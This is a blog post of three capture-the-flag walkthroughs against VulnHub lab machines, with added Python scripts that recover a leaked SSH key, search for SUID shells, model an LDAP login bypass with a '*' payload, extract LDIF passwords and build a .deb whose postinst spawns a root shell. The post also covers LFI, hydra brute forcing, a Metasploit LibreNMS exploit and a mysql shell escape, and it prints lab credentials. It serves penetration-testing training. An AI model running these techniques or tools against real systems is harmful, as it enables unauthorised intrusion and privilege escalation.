
Tuesday, March 1, 2022

InfoSec OSCP Voucher

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine InfoSec OSCP Voucher (listed on VulnHub as InfoSec Prep: OSCP), from the VulnHub pentesting platform.

- InfoSec OSCP Voucher can be downloaded from here:

https://www.vulnhub.com/entry/infosec-prep-oscp,508/

- Once the virtual machine is downloaded and imported into VirtualBox:

2 - ENUMERATION

- Scanning with Nmap:

- Scanning port 80 more deeply we find robots.txt and the file secret.txt it discloses:

- Browsing the web server:

- However the most interesting piece of information is at the bottom of the page: "the only user on this box is oscp". That gives us a username to target:

- secret.txt is a large text file ending in ==, the padding Base64 appends when the input length is not a multiple of 3 bytes, so it is probably Base64-encoded:

- Transferring secret.txt to Kali:

- Decoding secret.txt (base64 -d) and writing the output to a new file named key, we discover it is an OpenSSH private key (it starts with -----BEGIN OPENSSH PRIVATE KEY-----):

3 - EXPLOITATION

- Setting the right permissions on key (chmod 600); ssh refuses to use a private key that other users can read:

- Now we can SSH in as user oscp with the key (ssh -i key oscp@<target>):
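
- The steps above (spot the Base64, decode it, confirm it is a private key, save it with safe permissions) as one script. This is an added example for this write-up, not the walkthrough's own commands; the equivalent one-liner is base64 -d secret.txt > key && chmod 600 key. The list of key headers it recognises and the 0600 check are the only assumptions:

```python
import base64
import binascii
import os
import re
import stat
from typing import Optional

# PEM-style markers for the private key formats ssh accepts.
KEY_HEADERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
)

_B64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def looks_base64(text: str) -> bool:
    """The heuristic from the walkthrough made precise: only the Base64 alphabet,
    length a multiple of 4 once line breaks are removed, and at most two '='
    padding characters at the very end."""
    compact = "".join(text.split())
    return len(compact) >= 4 and len(compact) % 4 == 0 and bool(_B64_RE.match(compact))


def decode_secret(text: str) -> bytes:
    """Strict Base64 decode (line breaks tolerated); ValueError if it is not Base64."""
    compact = "".join(text.split())
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError(f"not valid Base64: {exc}") from exc


def key_type(data: bytes) -> Optional[str]:
    """Return the matching header line, or None if the bytes are not a private key."""
    for header in KEY_HEADERS:
        if data.lstrip().startswith(header):
            return header.decode()
    return None


def write_key(data: bytes, path: str) -> int:
    """Create the file with mode 0600 from the first instant (no window in which
    it is group/world readable) and return the permission bits actually set.
    ssh refuses a private key that other users can read."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o600)  # the file may have existed already with looser bits
    return stat.S_IMODE(os.stat(path).st_mode)


def recover_key(secret_path: str, key_path: str) -> str:
    """secret.txt -> key: read, sanity-check, decode, verify it is a key, save 0600.
    Returns the detected key header; raises ValueError if any step fails."""
    with open(secret_path, "r", encoding="ascii") as fh:
        text = fh.read()
    if not looks_base64(text):
        raise ValueError("content does not look like Base64")
    data = decode_secret(text)
    header = key_type(data)
    if header is None:
        raise ValueError("decoded data is not a recognised private key")
    write_key(data, key_path)
    return header


if __name__ == "__main__":
    import sys
    found = recover_key(sys.argv[1], sys.argv[2])
    print(f"{found} written to {sys.argv[2]}")
    print(f"next: ssh -i {sys.argv[2]} oscp@<target-ip>")
```

Run it as python3 recover_key.py secret.txt key; it refuses to write anything that does not decode to a key, so a false positive (a Base64 blob that is not a key) is caught before ssh complains about it.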

4 - PRIVILEGE ESCALATION

- Looking for binaries with the SUID bit set (find / -perm -4000 -type f 2>/dev/null), /usr/bin/bash stands out: a root-owned SUID bash gives whoever runs it an effective UID of 0:

- Finally it is easy to get a root shell: just run /usr/bin/bash with option -p. Without -p, bash notices at startup that its effective UID differs from the real UID and drops the privilege; -p (privileged mode) keeps euid 0, which id then reports as euid=0(root):
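
- The SUID search as an added Python example (not code from the walkthrough). It reproduces the find -perm -4000 walk, skips directories it cannot read instead of aborting, and flags root-owned SUID files whose name is a shell or interpreter, the case where no bug is needed at all. The shortlist of such names is a constructed assumption for the example:

```python
import os
import stat
from typing import Iterator, List, Tuple

# Programs where a root-owned SUID copy is a root shell by design. Constructed
# shortlist for this example, not a complete table.
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "ksh", "python", "python3", "perl"}


def suid_entries(root: str) -> Iterator[Tuple[str, int, int]]:
    """Yield (path, st_mode, owner uid) for every regular file under root that
    has the setuid bit. lstat is used so symlinks are not followed, and
    directories we cannot read are skipped rather than stopping the walk."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode, st.st_uid


def find_suid(root: str = "/") -> List[str]:
    """Same result as: find ROOT -perm -4000 -type f 2>/dev/null | sort"""
    return sorted(path for path, _mode, _uid in suid_entries(root))


def interesting_suid(root: str = "/", owner_uid: int = 0) -> List[str]:
    """SUID files owned by owner_uid (root by default) whose basename is a shell
    or interpreter. Each line mimics ls -l so the 's' in rwsr-xr-x is visible,
    e.g. '-rwsr-xr-x uid=0 /usr/bin/bash'."""
    hits = []
    for path, mode, uid in suid_entries(root):
        if uid == owner_uid and os.path.basename(path) in SHELL_LIKE:
            hits.append(f"{stat.filemode(mode)} uid={uid} {path}")
    return sorted(hits)


if __name__ == "__main__":
    for line in interesting_suid("/"):
        print(line)
    # For a hit such as /usr/bin/bash the follow-up is 'bash -p': without -p bash
    # drops euid back to the real uid at startup, with -p it keeps euid 0.
```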

5 - CAPTURING THE FLAG

- Going to root's folder and reading the flag:

Symfonos_5

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_5, from the VulnHub pentesting platform.

- Symfonos_5 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-52,415/

- Once the virtual machine is downloaded and imported into VirtualBox:

2 - ENUMERATION

- Scanning with Nmap:

- Browsing the web server:

- Directory brute-forcing the web server we find admin.php:

- Opening admin.php we are presented with a login form:

3 - EXPLOITATION

- Using wfuzz with the wordlist SQL.txt (a list of injection payloads) against the login form, so that the response code and size of each payload can be compared:

- There is a single 302 (redirect) response, for the payload "*", where every other payload gets a 200, so "*" is what we should try at the login form. A bare asterisk succeeding is the signature of a wildcard match in a search filter rather than an SQL quote trick, which fits the LDAP back end that the admin.php source reveals later:
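
- The bypass modelled end to end, as an added example rather than anything from the walkthrough: a toy login page that pastes the form fields into an LDAP filter, a minimal emulation of how a directory evaluates that filter, and the wfuzz-style baseline comparison that surfaces "*". The directory contents and the filter shape (&(uid=...)(userPassword=...)) are constructed assumptions; the escaping function is the RFC 4515 fix:

```python
import re
from typing import List, Optional

# Constructed toy directory for this example (uid -> cleartext userPassword).
DIRECTORY = {"zeus": "olympus", "admin": "letmein"}

# RFC 4515: characters that must be escaped inside a filter assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape user input before placing it in an LDAP filter (the fix)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter(user: str, password: str, escape: bool) -> str:
    """The filter a naive login page builds from the two form fields."""
    if escape:
        user, password = escape_filter_value(user), escape_filter_value(password)
    return f"(&(uid={user})(userPassword={password}))"


def _unescape(chunk: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), chunk)


def assertion_matches(assertion: str, value: str) -> bool:
    """Server-side semantics of (attr=assertion): an unescaped '*' matches any
    run of characters (substring filter); '\\xx' escapes are literal bytes, so an
    escaped \\2a is a plain asterisk and no longer a wildcard."""
    pattern = ".*".join(re.escape(_unescape(part)) for part in assertion.split("*"))
    return re.fullmatch(pattern, value) is not None


# Only the exact two-term AND is accepted; anything else (for instance an
# injected ')') is a malformed filter and the server rejects it.
_FILTER_RE = re.compile(r"^\(&\(uid=([^()]*)\)\(userPassword=([^()]*)\)\)$")


def search(filt: str) -> Optional[str]:
    """Emulated directory search: uid of the first entry matching the filter."""
    m = _FILTER_RE.match(filt)
    if not m:
        return None
    uid_assert, pw_assert = m.groups()
    for uid, pw in DIRECTORY.items():
        if assertion_matches(uid_assert, uid) and assertion_matches(pw_assert, pw):
            return uid
    return None


def login(user: str, password: str, escape: bool = False) -> int:
    """HTTP status the form returns: 302 (redirect to home.php) when the search
    finds an entry, 200 (form shown again) otherwise."""
    return 302 if search(build_filter(user, password, escape)) else 200


def fuzz_login(payloads: List[str], escape: bool = False) -> List[str]:
    """What wfuzz did: send each payload as username and password and keep the
    ones whose status differs from the baseline of a known-bad credential."""
    baseline = login("nobody", "wrong", escape)
    return [p for p in payloads if login(p, p, escape) != baseline]


if __name__ == "__main__":
    payloads = ["admin", "' OR 1=1--", "*", "a*", "*)(uid=*"]
    print("vulnerable:", fuzz_login(payloads))        # ['*']
    print("escaped:   ", fuzz_login(payloads, True))  # []
```

Note why "*" alone works: it makes both (uid=*) and (userPassword=*) true for every entry, so the AND matches the first user in the directory. A partial wildcard such as "a*" still fails here because the password branch must match too; that is also why, with escaping applied, no payload in the list changes the response.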

- The login is successful and we are presented with the page home.php:

- Viewing the source of home.php there is an interesting URL: a page is included by address through a request parameter, which leads to the idea of LFI (Local File Inclusion):

- Checking the URL, it points at localhost 127.0.0.1 and the page portraits.php; a parameter that accepts a full URL is worth testing with local paths too:

- Finally we confirm that the page is vulnerable to file inclusion: pointing the parameter at /etc/passwd returns the file's contents. Reading a local file this way is LFI; the same parameter accepting http:// URLs means remote inclusion (RFI) may be possible as well, but the local read is all we need here:

- Going back to admin.php:

- Viewing the source of admin.php (the PHP source, which the file inclusion lets us read; the browser's view-source shows only the rendered HTML) we discover the credentials admin:qMDdyZh3cT6eeAWD used to bind to LDAP:

- ldapsearch, binding to the LDAP server on port 389 with those credentials, returns the entry for user zeus with a userPassword of Y2V0a0tmNHdDdUhDOUZFVA==. This is Base64-encoded, not encrypted: ldapsearch prints values that are not safe as plain text in Base64 and marks them with a double colon (userPassword::):

- Decoding Y2V0a0tmNHdDdUhDOUZFVA== with base64 -d gives the cleartext password cetkKf4wCuHC9FET:
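
- Parsing the ldapsearch output programmatically, as an added Python example (not from the walkthrough). ldapsearch prints LDIF: a value that is not safe as plain text is written Base64-encoded after a double colon, and long values are folded onto continuation lines that start with a single space. The sample LDIF is constructed (the base DN dc=example,dc=com is invented); the zeus value is the one from the page:

```python
import base64
from typing import Dict, List

# Constructed LDIF shaped like ldapsearch output. '::' marks a Base64 value; a
# line starting with one space continues the previous value.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <dc=example,dc=com> with scope subtree
# filter: (objectclass=*)
#
dn: dc=example,dc=com
objectClass: top
objectClass: dcObject
dc: example

dn: uid=zeus,dc=example,dc=com
objectClass: inetOrgPerson
objectClass: top
uid: zeus
cn: zeus
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
description: Base64 is encod
 ing, not encryption

# search result
search: 2
result: 0 Success
"""


def unfold(text: str) -> List[str]:
    """Join LDIF continuation lines (leading space) onto the line before them."""
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Parse blank-line separated entries. 'attr:: value' is Base64 and is decoded
    here; 'attr:< url' is a URL reference (kept as text, not fetched); 'attr: value'
    is plain. Values are lists because attributes such as objectClass repeat."""
    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    for line in unfold(text) + [""]:
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        name, _sep, value = line.partition(":")
        if value.startswith(":"):
            decoded = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        elif value.startswith("<"):
            decoded = value[1:].strip()
        else:
            decoded = value.strip()
        current.setdefault(name, []).append(decoded)
    return entries


def extract_credentials(entries: List[Dict[str, List[str]]]) -> Dict[str, str]:
    """uid -> userPassword for every entry that exposes a password attribute. A
    value without a scheme prefix such as {SSHA} is a cleartext password."""
    return {e["uid"][0]: e["userPassword"][0]
            for e in entries if "uid" in e and "userPassword" in e}


if __name__ == "__main__":
    import sys
    ldif = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LDIF
    for uid, password in extract_credentials(parse_ldif(ldif)).items():
        print(f"{uid}:{password}")
```

Pipe real output into it (ldapsearch ... | python3 ldif_creds.py) and it prints user:password lines; with no input it runs on the constructed sample.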

- Now we can SSH in as zeus with it:

4 - PRIVILEGE ESCALATION

- User zeus has sudo privileges for /usr/bin/dpkg:

- dpkg is the tool that installs Debian packages, and installation runs the package's maintainer scripts (preinst, postinst, and so on) as root. So the idea for privilege escalation is to build a deb package whose install script runs /bin/bash, and install it with sudo dpkg -i.

- fpm builds packages of different types (deb, rpm, etc.) from a directory or a set of files:

- Installing fpm (it is a Ruby gem, so it needs ruby and gem on the attacking machine):

- Writing a simple exploit.sh that runs /bin/bash:

- fpm wraps exploit.sh into a deb package that runs it at install time:

- Transferring exploit_1.0_amd64.deb to the target:

- Installing exploit_1.0_amd64.deb with sudo /usr/bin/dpkg -i, the script runs as root and we get a root shell:
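
- The same package built without fpm, as an added Python example that is not the walkthrough's code: a .deb is just an ar archive holding debian-binary, control.tar.gz and data.tar.gz, and the postinst script inside control.tar.gz is what dpkg executes as root (the job fpm's after-install hook does). The package name and control fields are constructed; the build is checked by parsing the archive back:

```python
import io
import os
import tarfile
import time
from typing import Dict, Tuple

# Constructed package metadata: names are arbitrary, dpkg only requires these fields.
CONTROL = """\
Package: exploit
Version: 1.0
Architecture: amd64
Maintainer: nobody <nobody@example.invalid>
Description: dpkg maintainer-script privilege escalation demo
"""

# postinst runs after unpacking. dpkg itself runs as root under sudo and the
# maintainer scripts inherit its stdin/stdout, so this is an interactive root shell.
POSTINST = "#!/bin/sh\nexec /bin/bash\n"


def _tar_gz(files: Dict[str, Tuple[bytes, int]], dirs: Tuple[str, ...] = ()) -> bytes:
    """In-memory .tar.gz from {name: (content, mode)} plus directory entries."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for d in dirs:
            info = tarfile.TarInfo(d)
            info.type = tarfile.DIRTYPE
            info.mode = 0o755
            tar.addfile(info)
        for name, (content, mode) in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            info.mode = mode
            info.mtime = int(time.time())
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def _ar_member(name: str, data: bytes) -> bytes:
    """One member of a classic ar archive: 60-byte ASCII header (name, mtime, uid,
    gid, mode, size, magic), the data, then a newline pad to an even length."""
    header = (f"{name:<16}{int(time.time()):<12}{0:<6}{0:<6}{'100644':<8}"
              f"{len(data):<10}`\n").encode("ascii")
    assert len(header) == 60
    return header + data + (b"\n" if len(data) % 2 else b"")


def build_deb(postinst: str = POSTINST, control: str = CONTROL) -> bytes:
    """Members must appear in this order: debian-binary, control.tar.*, data.tar.*.
    control.tar holds metadata and maintainer scripts; data.tar is the payload and
    is left empty, so the install changes nothing on disk except running postinst."""
    control_tar = _tar_gz({
        "./control": (control.encode(), 0o644),
        "./postinst": (postinst.encode(), 0o755),  # must be executable or dpkg rejects it
    })
    data_tar = _tar_gz({}, dirs=("./",))
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control_tar)
            + _ar_member("data.tar.gz", data_tar))


def read_deb(blob: bytes) -> Dict[str, bytes]:
    """Parse the ar container back into {member name: bytes} to verify the build."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[0:16].decode().strip().rstrip("/")  # GNU ar may append '/'
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)
    return members


def _control_member(blob: bytes, wanted: str) -> Tuple[str, int]:
    with tarfile.open(fileobj=io.BytesIO(read_deb(blob)["control.tar.gz"]), mode="r:gz") as tar:
        for info in tar.getmembers():
            if os.path.normpath(info.name) == wanted:
                return tar.extractfile(info).read().decode(), info.mode
    raise KeyError(wanted)


def postinst_of(blob: bytes) -> Tuple[str, int]:
    """(script text, mode) of the postinst inside a built .deb."""
    return _control_member(blob, "postinst")


def control_of(blob: bytes) -> str:
    """The control file text inside a built .deb."""
    return _control_member(blob, "control")[0]


if __name__ == "__main__":
    out = "exploit_1.0_amd64.deb"
    with open(out, "wb") as fh:
        fh.write(build_deb())
    print(f"built {out}; on the target: sudo /usr/bin/dpkg -i {out}")
```

The defence is the mirror image: any sudo rule for dpkg (or apt, or anything that installs packages) is equivalent to full root, because maintainer scripts are arbitrary code run as root.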

5 - CAPTURING THE FLAG

- Reading proof.txt:

Symfonos_2

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_2, from the VulnHub pentesting platform.

- Symfonos_2 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-2,331/

- Once the virtual machine is downloaded and imported into VirtualBox:

2 - ENUMERATION

- Scanning with Nmap:

- Connecting to the web server:

- Scanning with enum4linux we discover an SMB share named anonymous:

- Connecting with credentials anonymous:anonymous:

- Changing to the folder backups and downloading log.txt:

- log.txt reveals the existence of user aeolus:

3 - EXPLOITATION

- Hydra with the rockyou.txt wordlist finds the password sergioteamo for user aeolus:

- However direct SSH access with it is denied:

- Metasploit with the module auxiliary/scanner/ssh/ssh_login yields a better result and gives us a session:

4 - PRIVILEGE ESCALATION

- netstat lists the listening sockets; one of them, port 8080, is only bound locally and was not visible in the external Nmap scan:

- To reach the web server on port 8080 we forward it through our session to a port on the attacking machine, for instance 4444:

- Now the hidden web server is reachable through the forwarded port:

- The application is LibreNMS, which is vulnerable to this exploit:

- Looking for a related Metasploit module:

- Setting the parameters and running the exploit we get a new command shell, as the user cronus:

- Upgrading to a fully interactive shell:

- Checking cronus' sudo privileges (sudo -l):

- The mysql client's \! command (an alias of system) runs an arbitrary operating-system command from inside the client. Because sudo starts the client as root, that command runs as root as well, as explained here:

- Running \! /bin/bash from the mysql prompt we get a root shell:

5 - CAPTURING THE FLAG

- Reading proof.txt: